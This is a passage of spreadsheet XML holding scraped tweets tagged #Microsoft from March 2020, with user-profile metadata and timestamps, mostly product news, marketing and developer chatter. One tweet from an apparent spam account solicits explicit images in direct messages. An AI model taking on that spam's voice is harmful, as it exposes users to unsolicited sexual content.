    <t>It's justified to forget the name, right? https://t.co/hzBy4GUCoN #java #Microsoft #csharp #devhumor https://t.co/PYLIRRjphf</t>
  </si>
  <si>
    <t>{'id': 2853569661, 'id_str': '2853569661', 'name': 'Devhumor', 'screen_name': 'dev_humor', 'location': '', 'description': '#DevHumor is where developers from all over the world relax and share funny posts related to #DevLife &amp; #programming with their peers.', 'url': 'https://t.co/0v64G7qRhA', 'entities': {'url': {'urls': [{'url': 'https://t.co/0v64G7qRhA', 'expanded_url': 'https://devhumor.com/', 'display_url': 'devhumor.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5829, 'friends_count': 1143, 'listed_count': 163, 'created_at': 'Fri Oct 31 18:42:09 +0000 2014', 'favourites_count': 225, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4157,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'http://pbs.twimg.com/profile_images/712934772247552002/VLwe7l-V_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/712934772247552002/VLwe7l-V_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2853569661/1461154496', 'profile_link_color': 'FF0000',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</si>
  <si>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21:00:34 +0000 2020</t>
  </si>
  <si>
    <t>If you are in the insurance industry you should be making the move to #MSDyn365 CRM to leverage actionable insights &amp;amp; data! 
Download the flyer learn more: https://t.co/fosxN3jo7l
@CoreBTS #insurance #Dynamics365 #Microsoft @MSDynamicsCRM @Microsoft https://t.co/10Gy2CcGZM</t>
  </si>
  <si>
    <t>Wed Mar 04 21:00:31 +0000 2020</t>
  </si>
  <si>
    <t>What's the difference between a Microsoft Dynamics 365 Business Central Team Member and a Dynamics NAV Limited User? Find out here:
https://t.co/b2N7oyqeyu
#Microsoft #MSDyn365bc #MSDynNAV #NAV #Navision #ERP #TeamMember #Users #LimitedUser "</t>
  </si>
  <si>
    <t>Wed Mar 04 20:59:32 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft         No matter where your job takes you, Microsoft365 can adapt to your security needs, keeping company information safe without hindering you day to day. https://t.co/748XosvV89</t>
  </si>
  <si>
    <t>Wed Mar 04 20:58:02 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports
https://t.co/e9c9OFJmAR
#Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>{'id': 819363086, 'id_str': '819363086', 'name': 'Kasun Kodagoda', 'screen_name': 'kasun_kodagoda', 'location': 'Gampaha, Sri Lanka', 'description': '#Azure &amp; #DevOps Enthusiast | Blogger | Open Source Contributor | Speaker | Cricket Fanatic | Mostly Gentle, Sometimes Crazy | Tech Lead @99XTechnology', 'url': 'https://t.co/SNM1MVu6LQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/SNM1MVu6LQ', 'expanded_url': 'https://kasunkodagoda.com', 'display_url': 'kasunkodagoda.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 884, 'friends_count': 1000, 'listed_count': 21, 'created_at': 'Wed Sep 12 11:22:58 +0000 2012', 'favourites_count': 1217, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2357, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '94D487', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1166022205400133634/Z2jkr3Au_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1166022205400133634/Z2jkr3Au_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/819363086/1532397226', 'profile_link_color': '0D682A',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</si>
  <si>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Wed Mar 04 20:56:57 +0000 2020</t>
  </si>
  <si>
    <t>Whats New in Microsoft Teams | February 2020 https://t.co/4U8iKMLxLF #microsoftteams #teams #microsoft #feb2020</t>
  </si>
  <si>
    <t>{'id': 16897946, 'id_str': '16897946', 'name': 'thiagobeier', 'screen_name': 'thiagobeier', 'location': 'Toronto, Ontario', 'description': 'Microsoft Consultant @LongViewSystems | #Azure #Cloud #Management #Security #Office365 #MicrosoftTeams #TakeTheLongView', 'url': 'https://t.co/I0HzAr04Au', 'entities': {'url': {'urls': [{'url': 'https://t.co/I0HzAr04Au', 'expanded_url': 'http://thiagobeier.wordpress.com', 'display_url': 'thiagobeier.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 271, 'friends_count': 989, 'listed_count': 1, 'created_at': 'Wed Oct 22 01:28:21 +0000 2008', 'favourites_count': 162, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 380,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'http://pbs.twimg.com/profile_images/1086104204568088577/5_forD7q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1086104204568088577/5_forD7q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16897946/1558628866',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</si>
  <si>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20:54:15 +0000 2020</t>
  </si>
  <si>
    <t>Shout out to  @HeyJasmineJ for throwing me  on  https://t.co/h9eDOuwkhH 
A showcase of talented content creators of color from around the internet. 
#gratitude #poc #contentcreators #streamer #twitch #mixer  #Microsoft #Xbox #SeriesX #PS5  #clip #videogames  #abg #zilllathegod https://t.co/ner5js7tWv</t>
  </si>
  <si>
    <t>Wed Mar 04 20:49:14 +0000 2020</t>
  </si>
  <si>
    <t>Give me your dicks in DM. I will masturbate #Manchester-by-the-Sea   #microsoft #team https://t.co/F3Br2xEsny</t>
  </si>
  <si>
    <t>{'id': 1235250351118442496, 'id_str': '1235250351118442496', 'name': 'Heather Evans', 'screen_name': 'saddhocanse', 'location': 'Springfield, USA', 'description': 'The heart wants what it wants. Thereâ€™s no logic to these things. You meet someone and you fall in love and thatâ€™s that', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 18, 'listed_count': 0, 'created_at': 'Wed Mar 04 17:07:24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'http://pbs.twimg.com/profile_images/1235259709248196608/UiosDc-i_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235259709248196608/UiosDc-i_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235250351118442496/1583343877',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</si>
  <si>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20:49:13 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports #Microsoft #Azure https://t.co/PRECXPFiyv</t>
  </si>
  <si>
    <t>{'id': 15174595, 'id_str': '15174595', 'name': 'Elias Mereb', 'screen_name': 'emereb', 'location': 'Miami, FL', 'description': 'Azure Technical Trainer @Microsoft Worldwide Learning | Former eleven-time Microsoft MVP, MCT, certification junkie and progressive rock/metal aficionado.', 'url': 'https://t.co/NjodGcfpcg', 'entities': {'url': {'urls': [{'url': 'https://t.co/NjodGcfpcg', 'expanded_url': 'http://www.linkedin.com/in/eliasmereb', 'display_url': 'linkedin.com/in/eliasmereb', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2074, 'friends_count': 2205, 'listed_count': 121, 'created_at': 'Thu Jun 19 23:32:30 +0000 2008', 'favourites_count': 525, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14168,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'http://pbs.twimg.com/profile_images/984837250130305024/kybzH-YU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/984837250130305024/kybzH-YU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15174595/1400600204', 'profile_link_color': '009999',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</si>
  <si>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Wed Mar 04 20:49:10 +0000 2020</t>
  </si>
  <si>
    <t>Dont Be Fooled by This ##XboxSeriesX Gameplay Rumor - #GamingNews #Microsoft - https://t.co/1OmpBxrW5t</t>
  </si>
  <si>
    <t>Wed Mar 04 20:47:50 +0000 2020</t>
  </si>
  <si>
    <t>What happened in 1976? https://t.co/lD16FYq8ER #apple #Microsoft #history #Timetravel #KindleUnlimited https://t.co/RsPh5oPtcS #history</t>
  </si>
  <si>
    <t>{'id': 2780504052, 'id_str': '2780504052', 'name': 'Time Patrol', 'screen_name': 'GiftofFailure', 'location': 'Possibility Palace', 'description': 'Time Patrol series by NY Times Bestselling author, former Green Beret, feeder of Cool Gus,  Sometimes here, Sometimes there. Sometimes now, Sometimes then.', 'url': 'https://t.co/49Xuk9E3Aw', 'entities': {'url': {'urls': [{'url': 'https://t.co/49Xuk9E3Aw', 'expanded_url': 'http://bobmayer.com/freebies/', 'display_url': 'bobmayer.com/freebies/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 124, 'friends_count': 38, 'listed_count': 5, 'created_at': 'Sat Aug 30 13:00:09 +0000 2014', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6267,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'http://pbs.twimg.com/profile_images/984570730754035713/pIdg2FaJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/984570730754035713/pIdg2FaJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2780504052/1504699009',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</si>
  <si>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20:47:02 +0000 2020</t>
  </si>
  <si>
    <t>Dive right into coding with Blockly, a drag and drop language on April 29 in #NewYork. Sign up for this TechShop run by @ccsinet at https://t.co/RFRgSpXQ21 #gamedesign #blockly #microsoft #programming #coding #girlsintech https://t.co/G5QwuwaHfe</t>
  </si>
  <si>
    <t>{'id': 164666005, 'id_str': '164666005', 'name': 'TechGirlz', 'screen_name': 'TechGirlzorg', 'location': 'Philadelphia &amp; beyond', 'description': 'Empowering middle school girls to become future technology leaders. Mentor - Donate - Volunteer! Run Your Own TechShopz in a Boxâ„¢ https://t.co/DwmcZUaReG', 'url': 'https://t.co/DwmcZUaReG', 'entities': {'url': {'urls': [{'url': 'https://t.co/DwmcZUaReG', 'expanded_url': 'https://www.techgirlz.org/', 'display_url': 'techgirlz.org', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/DwmcZUaReG', 'expanded_url': 'https://www.techgirlz.org/', 'display_url': 'techgirlz.org', 'indices': [130, 153]}]}}, 'protected': False, 'followers_count': 10277, 'friends_count': 5614, 'listed_count': 490, 'created_at': 'Fri Jul 09 12:50:12 +0000 2010', 'favourites_count': 3140, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7958, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '71787A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1199632953959170049/v4qKSEkM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199632953959170049/v4qKSEkM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/164666005/1569856564', 'profile_link_color': 'CC3366',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</si>
  <si>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20:46:55 +0000 2020</t>
  </si>
  <si>
    <t>Download Microsoft Identity Manager 2016 Free https://t.co/PMKeluavkC via @YouTube #Microsoft #SystemAdmin #SystemAdministrator #SystemAdministration #MIM #FIM #Tech #Technology</t>
  </si>
  <si>
    <t>Wed Mar 04 20:44:58 +0000 2020</t>
  </si>
  <si>
    <t>New portrait... #drawing #Sketching #sketchbook #sketch #cat #portraitartist #doodle #artragepro #artrage #surfacepro #artist #pencildrawing #draw_portrait #microsoft #beard #edc_cooperative #artist... https://t.co/H7jnsnWfXi</t>
  </si>
  <si>
    <t>Wed Mar 04 20:40:48 +0000 2020</t>
  </si>
  <si>
    <t>Want to Know How to Stream on Mixer? We Have the Guide | Digital Trends https://t.co/yvH2DddMHe #microsoft</t>
  </si>
  <si>
    <t>{'id': 910927369703247872, 'id_str': '910927369703247872', 'name': 'Social ðŸ‡¨ðŸ‡¦ ðŸ‡ºðŸ‡¸ðŸ‡¬ðŸ‡§', 'screen_name': 'SHGNations', 'location': 'Toronto, Ontario', 'description': 'Streaming Monday - Friday at https://t.co/F6vPsLrIb6 streams start at 8am EST. You can also catch them here on Twitter.', 'url': 'https://t.co/F6vPsLrIb6', 'entities': {'url': {'urls': [{'url': 'https://t.co/F6vPsLrIb6', 'expanded_url': 'http://mixer.com/socialhourgaming', 'display_url': 'mixer.com/socialhourgamiâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/F6vPsLrIb6', 'expanded_url': 'http://mixer.com/socialhourgaming', 'display_url': 'mixer.com/socialhourgamiâ€¦', 'indices': [29, 52]}]}}, 'protected': False, 'followers_count': 2031, 'friends_count': 4894, 'listed_count': 6, 'created_at': 'Thu Sep 21 18:03:03 +0000 2017', 'favourites_count': 3884, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 23237, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1151293347149025280/Jr_HDk8K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151293347149025280/Jr_HDk8K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/910927369703247872/1582757326',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</si>
  <si>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20:36:07 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "J.Crew Disables User Accounts After Credential Stuffing Attack:" https://t.co/zv0GowP1Yq
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Mar 04 20:35:35 +0000 2020</t>
  </si>
  <si>
    <t>#Bitswift.tech also packages #Google apps (#GSuite) or #Microsoft O365 options for cloud based business productivity solutions.</t>
  </si>
  <si>
    <t>{'id': 779845783029895168, 'id_str': '779845783029895168', 'name': 'bitswift.tech', 'screen_name': 'bitswift_tech', 'location': 'Kingston, Ontario', 'description': 'Enriching lives through technology â„¢', 'url': 'https://t.co/buf5b5XW7d', 'entities': {'url': {'urls': [{'url': 'https://t.co/buf5b5XW7d', 'expanded_url': 'http://bitswift.tech', 'display_url': 'bitswift.tech', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1778, 'friends_count': 4488, 'listed_count': 54, 'created_at': 'Sun Sep 25 00:51:38 +0000 2016', 'favourites_count': 1432, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 863,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'http://pbs.twimg.com/profile_images/1082041052901429248/0j35fN-3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082041052901429248/0j35fN-3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/779845783029895168/1485555936',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</si>
  <si>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20:33:18 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft teased that the company is experimenting with a new start menu design for #Windows10 that will make the company emphasize its current live data interface.
https://t.co/DXoVcI7CpO</t>
  </si>
  <si>
    <t>{'id': 908433695844872192, 'id_str': '908433695844872192', 'name': 'icvsTech', 'screen_name': 'icvstech', 'location': 'india', 'description': 'At iCvsTech, We share latest technology news and articles, how-tos? and a lot more. Stay tuned with us to get latest tech update.', 'url': 'https://t.co/Uz4uuBUp5u', 'entities': {'url': {'urls': [{'url': 'https://t.co/Uz4uuBUp5u', 'expanded_url': 'https://www.icvstech.com/blog', 'display_url': 'icvstech.com/blog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 154, 'friends_count': 96, 'listed_count': 0, 'created_at': 'Thu Sep 14 20:54:05 +0000 2017', 'favourites_count': 779, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2690,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'http://pbs.twimg.com/profile_images/1199976361537888257/gdMtQIen_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199976361537888257/gdMtQIen_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/908433695844872192/1579971903',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</si>
  <si>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20:33:12 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that there is estimated  over 1,000,000 Laptops  &amp;amp; Desktops still running Win 7 !! ?? Time is running out "Upgrade Now" .... #windows10 #onenote #office365 #skypeforbusiness #microsoft #desktops #laptops #upgrade #technology https://t.co/kGoxg4reqI</t>
  </si>
  <si>
    <t>{'id': 170417248, 'id_str': '170417248', 'name': 'DJRasJalal', 'screen_name': 'Jalal_Byron', 'location': 'Houston,TX', 'description': 'I.T. Guru born on the Tiny Island of Trinidad..', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 168, 'listed_count': 1, 'created_at': 'Sat Jul 24 19:42:24 +0000 2010', 'favourites_count': 107, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 778, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '120909', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1166310147939086342/Ji89wxAJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1166310147939086342/Ji89wxAJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/170417248/1565964079', 'profile_link_color': '981CEB',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</si>
  <si>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20:32:56 +0000 2020</t>
  </si>
  <si>
    <t>@ProtonMail @ProtonCalendar but...... but..... #Microsoft just announced their Dark theme in @Windows 10 calendar. Why wouldn't i use that ?!  https://t.co/2MT2KouBSS</t>
  </si>
  <si>
    <t>{'id': 842738186673684480, 'id_str': '842738186673684480', 'name': 'MonkeySeeMonkeyDo', 'screen_name': 'M0nkeySee', 'location': '', 'description': 'â€œWhat is freedom of expression? Without the freedom to offend, it ceases to exist.â€  -Salman Rushdie', 'url': 'https://t.co/Rxkya2Mrjo', 'entities': {'url': {'urls': [{'url': 'https://t.co/Rxkya2Mrjo', 'expanded_url': 'https://en.wikipedia.org/wiki/Monkey_see,_monkey_do', 'display_url': 'en.wikipedia.org/wiki/Monkey_seâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 43, 'friends_count': 108, 'listed_count': 0, 'created_at': 'Fri Mar 17 14:03:35 +0000 2017', 'favourites_count': 1007, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1986, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/859798996386287616/E93TRUwI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/859798996386287616/E93TRUwI_normal.jpg',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</si>
  <si>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20:30:07 +0000 2020</t>
  </si>
  <si>
    <t>How to configure #Microsoft #AzureAD "Stay signed in" prompt? You must create a #ConditionalAccess policy. It's required to select "All cloud apps" (Impacts all!) to configure persistent browser session. I recommend setting this option to "Never persistent" for all users / apps. https://t.co/lQCGSQZI0r</t>
  </si>
  <si>
    <t>{'id': 3431596001, 'id_str': '3431596001', 'name': 'Daniel Weppeler', 'screen_name': '_DanielWep', 'location': 'Wuppertal, Nordrhein-Westfalen', 'description': 'Senior Consultant @braincon_GmbH | #CitrixADC #NetScaler | Cloud Advocate | #Azure | #ShareFile | #MCSE | CCP-N | CCP-M', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 236, 'friends_count': 436, 'listed_count': 5, 'created_at': 'Wed Aug 19 15:03:33 +0000 2015', 'favourites_count': 646, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 354,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'http://pbs.twimg.com/profile_images/634021777753153536/axAGMIba_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/634021777753153536/axAGMIba_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3431596001/1552582090',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</si>
  <si>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Submit a nomination for the Microsoft Partner of the Year Awards #Microsoft #MSPartner https://t.co/iohrIQlJ8M</t>
  </si>
  <si>
    <t>Wed Mar 04 20:27:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge Canary, Chrome Beta Gets Dedicated PiP Button in Global Media Controls
#microsoft #GoogleChrome #MicrosoftEdgeChromium #feature #webshoutz
list your website free on our new business directory
https://t.co/1Jn4lFkwTl https://t.co/7fO8YsF3HR</t>
  </si>
  <si>
    <t>{'id': 605381086, 'id_str': '605381086', 'name': 'WEB SHOUTZ', 'screen_name': 'WEBSHOUTZ', 'location': ' 89135, Las Vegas, NV.', 'description': 'The Enterprise Leader in Organic and SMM SMO Local SEO rank monitoring,PPC,Errand Service', 'url': 'http://t.co/uomiiRTSZV', 'entities': {'url': {'urls': [{'url': 'http://t.co/uomiiRTSZV', 'expanded_url': 'http://WEBSHOUTZ.COM', 'display_url': 'WEBSHOUTZ.COM', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 705, 'friends_count': 1834, 'listed_count': 18, 'created_at': 'Mon Jun 11 12:28:01 +0000 2012', 'favourites_count': 30, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1594, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F9FAFC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2395022135/eotkrn6et6hzah4pjh7o_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2395022135/eotkrn6et6hzah4pjh7o_normal.jpeg', 'profile_link_color': '0976EB',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</si>
  <si>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Wed Mar 04 20:22:55 +0000 2020</t>
  </si>
  <si>
    <t>OneDrive Roadmap #Roundup  February 2020 #hosting #Roadmaps https://t.co/WInAirWSM1 #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Wed Mar 04 20:22:28 +0000 2020</t>
  </si>
  <si>
    <t>OneDrive Roadmap Roundup  February 2020 https://t.co/epxQfD5qa1 #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 20:17:57 +0000 2020</t>
  </si>
  <si>
    <t>More evidence - Tough times for legacy tech vendors, and golden time for the Cloud https://t.co/GFfiMHQ7P0 via #IBM #cloud #oracle #aws #google #ServiceNow #SAP #Microsoft #salesforce</t>
  </si>
  <si>
    <t>Wed Mar 04 20:17:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft and the NFL expand partnership to accelerate digital transformation across the League https://t.co/1xvK52rngJ #NFL #Microsoft #ModernWorkPlace</t>
  </si>
  <si>
    <t>{'id': 15230902, 'id_str': '15230902', 'name': 'Dan St. Hilaire', 'screen_name': 'dansth', 'location': 'Burlington, VT', 'description': "Co-founder https://t.co/JbOfsHj5wJ TechGeek #Office365, #MicrosoftTeams, #SharePoint, #PowerBI #Cloud #UserAdoption, Skiing #craftbeer NE Pat's Fan", 'url': 'https://t.co/SRGhXBcEKZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/SRGhXBcEKZ', 'expanded_url': 'http://www.knowledgewave.com', 'display_url': 'knowledgewave.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/JbOfsHj5wJ', 'expanded_url': 'http://KnowledgeWave.com', 'display_url': 'KnowledgeWave.com', 'indices': [11, 34]}]}}, 'protected': False, 'followers_count': 1017, 'friends_count': 710, 'listed_count': 116, 'created_at': 'Wed Jun 25 13:30:15 +0000 2008', 'favourites_count': 670, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2933,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'http://pbs.twimg.com/profile_images/1150130647375208448/yB_sxSHt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1150130647375208448/yB_sxSHt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15230902/1424027856',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</si>
  <si>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20:16:21 +0000 2020</t>
  </si>
  <si>
    <t>A refreshing IoT solution for remote water monitoring https://t.co/WEuABSY8BX
For more info: https://t.co/oJOGgRcf9u #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto https://t.co/zz25EVM6yP</t>
  </si>
  <si>
    <t>Wed Mar 04 20:16:08 +0000 2020</t>
  </si>
  <si>
    <t>Citizen led #investigation leads to police raid after hackers hacked 
https://t.co/7Q9MG87ja3 #infosec #Microsoft</t>
  </si>
  <si>
    <t>{'id': 137295661, 'id_str': '137295661', 'name': 'Jonathan Armstrong', 'screen_name': 'armstrongjp', 'location': 'United Kingdom', 'description': 'Compliance &amp; technology lawyer @CorderyUK, looking after international (mainly US) clients with experience of working on issues in more than 60 countries', 'url': 'https://t.co/bEp1SaxK0E', 'entities': {'url': {'urls': [{'url': 'https://t.co/bEp1SaxK0E', 'expanded_url': 'http://uk.linkedin.com/in/jparmstrong', 'display_url': 'uk.linkedin.com/in/jparmstrong', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2115, 'friends_count': 1275, 'listed_count': 285, 'created_at': 'Mon Apr 26 10:59:49 +0000 2010', 'favourites_count': 1311, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17315, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '00FF37', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1224249153733251074/rw3cRIjc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224249153733251074/rw3cRIjc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/137295661/1461594480', 'profile_link_color': '9266CC', 'profile_sidebar_border_color': '2908FF', 'profile_sidebar_fill_color': 'CCFF54', 'profile_text_color': '1A0B0B', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 20:15:28 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 20:15:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Invests In A New #AI For #Health Initiative https://t.co/tfcMpp4Bci</t>
  </si>
  <si>
    <t>{'id': 1022515094306127875, 'id_str': '1022515094306127875', 'name': 'Alexander Titus', 'screen_name': '1AlexanderTitus', 'location': 'United States', 'description': 'Head of #Biotechnology, Data Scientist, &amp; #Oregon native. Often lost in thought or lost in the woods, sometimes both. Thoughts are my own.', 'url': 'https://t.co/2VDqxKGMlO', 'entities': {'url': {'urls': [{'url': 'https://t.co/2VDqxKGMlO', 'expanded_url': 'https://alexandertitus.com', 'display_url': 'alexandertitus.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4588, 'friends_count': 781, 'listed_count': 29, 'created_at': 'Thu Jul 26 16:12:50 +0000 2018', 'favourites_count': 63, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 217, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1223559743328997379/Y9KAccyk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223559743328997379/Y9KAccyk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1022515094306127875/1577289851',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</si>
  <si>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20:14:35 +0000 2020</t>
  </si>
  <si>
    <t>I wonder how many millions of dollars the invention of "Smart Quotes" has cost the world in lost productivity due to left/right quotes not being valid syntax? #Microsoft #AntiPatterns</t>
  </si>
  <si>
    <t>{'id': 19079050, 'id_str': '19079050', 'name': 'ð“¢ð“¸ð“¯ð“½ð“·ð“®ð“¼ð“¼ Guaranteed ðŸ¦ðŸ’— FE2020', 'screen_name': 'eanbowman', 'location': 'Toronto, Ontario, Canada', 'description': "https://t.co/OKbSu64XRl  I'm a web developer. I make games. I make art.\nshe/her\nMarried to the lovely biku.\n\nhttps://t.co/BI6eWcmXHC\nsend a ko-fi!", 'url': 'https://t.co/UVQvECinbw', 'entities': {'url': {'urls': [{'url': 'https://t.co/UVQvECinbw', 'expanded_url': 'http://www.eanbowman.com/', 'display_url': 'eanbowman.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/OKbSu64XRl', 'expanded_url': 'http://eanbowman.com', 'display_url': 'eanbowman.com', 'indices': [0, 23]}, {'url': 'https://t.co/BI6eWcmXHC', 'expanded_url': 'http://ko-fi.com/A885898', 'display_url': 'ko-fi.com/A885898', 'indices': [109, 132]}]}}, 'protected': False, 'followers_count': 462, 'friends_count': 1111, 'listed_count': 56, 'created_at': 'Fri Jan 16 18:35:09 +0000 2009', 'favourites_count': 115338, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': 